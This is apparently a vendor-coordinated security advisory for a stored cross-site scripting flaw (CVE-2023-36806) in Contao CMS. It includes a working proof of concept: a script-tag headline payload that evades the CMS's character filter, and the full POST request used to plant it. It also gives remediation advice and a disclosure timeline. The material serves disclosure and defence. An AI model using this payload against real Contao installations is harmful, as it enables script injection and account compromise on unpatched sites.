usd-2023-0020 | XSS in Contao v.4.13.28

Advisory ID: usd-2023-0020
Product: Contao CMS
Affected Version: 4.0.0 to 4.9.42, 4.13.28, and 5.1.10
Vulnerability Type: CWE-79
Security Risk: MEDIUM
Vendor URL: https://contao.org/en/
Vendor Status: Fixed
CVE number: CVE-2023-36806
CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2023-36806

Desciption

Contao is a powerful open source CMS that lets you create professional websites and scalable web applications.

A user of a low-privileged role can send along an XSS payload via a modification of the request that creates an article with a headline, which is triggered in the frontend and in the backend.

When choosing the headline, different h tags can be used.
However, these are not checked by the Contao system on the server side.
If a script tag is sent instead, the headline is embedded in a script tag. The headline can then be used for the content of a payload.
Although the Contao backend filters out certain special characters like = ( ) < > at this point, this is not sufficient to prevent a successful payload.

Proof of Concept

To include the XSS in the payload, the headline[unit] attribute for the HTML value of the headline must be changed from an h tag to a script tag. Then the following payload can be entered in the headline[value] field:

Reflect.apply.call*${alert}${undefined}${[document.domain]}***

POST /contao?do=article&id=10767&table=tl_content&act=edit&rt=b64d9e8[...] HTTP/1.1
Host:vulnerable-host.de
[...]
&headline%5Bvalue%5D=Reflect.apply.call%60%24%7Balert%7D%24%7Bundefined%7D%24%7B%5Bdocument.domain%5D%7D%60µ&µheadline%5Bunit%5D=scriptµ&text=%3Cp%3Etest%3C%2Fp%3E&addImage=&customTpl=&protected=&guests=&cssID%5B%5D=&cssID%5B%5D=&invisible=&start=&stop=&save=

The payload is triggered in the fronted but also in the backend.

Fix

It is recommended to classify any input on the website as potentially dangerous.
All output generated dynamically using user-controlled data should be coded according to the output context.

In addition, all input should be validated or filtered on the server side. Where possible, a list of allowed characters should also be used to validate input values. The narrower such a filter can be, the more effective its protection.
Allowlists are particularly recommended if input values have a precisely defined format or if a list of allowed input values exists.

References

Timeline

  • 2023-06-29: First contact request via security@contao.org.
  • 2023-06-30: Response by Contao's Security Team with a preliminary patch for and a request for retesting.
  • 2023-07-03: A review of the patch shows that the issue is mitigated.
  • 2023-07-17: Contao informs that the patch is scheduled to release of the 25th of July.
  • 2023-07-25: Patch is released, usd analysts Fabian Brenner and Christian Pöschl are credited for their research.
  • 2023-10-20: Advisory released by usd AG.

Credits

This security vulnerability was identified by Fabian Brenner and Christian Pöschl of usd AG.